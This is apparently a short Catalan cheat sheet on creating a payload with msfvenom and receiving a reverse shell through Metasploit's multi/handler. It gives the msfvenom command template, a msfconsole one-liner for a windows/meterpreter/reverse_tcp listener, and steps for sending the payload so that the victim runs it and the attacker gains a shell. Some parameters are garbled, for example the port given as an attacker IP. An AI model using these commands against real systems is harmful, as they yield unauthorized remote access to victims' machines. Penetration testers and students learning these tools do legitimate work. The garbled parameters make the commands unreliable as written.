Generació d'un Payload amb MSFVenom

Format #

-p payload
lhost=IPAtacant
lport=IPAtacant
-f formatdesti(Per exemple exe)
-o fitxerdestí

Pas1: Generar un payload #

msfvenom -a ArquitecturaOncorrerà --platform plataforma -p payload --LHOST IPAtacant LPORT PORTAtacant -e encoder -f format -o output

Pas2: arrancar el procés que escolta #

  • exemple

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST IP; set LPORT port; run; exit .y"
  • També pots arrancar el metasploit i executar-lo manualment. Has de vigilar que els paràmetres es corresponguin al del payload

Pas3 i 4: enviar el payload / rebre shell #

  • enviem el payload
  • L'executa i inmediatament tenim accés a la shell

Alternativa MSFVenom Payload Creator #

  • msfpc és un script interactiu per a crear payloads que utilitza msfvenom com a motor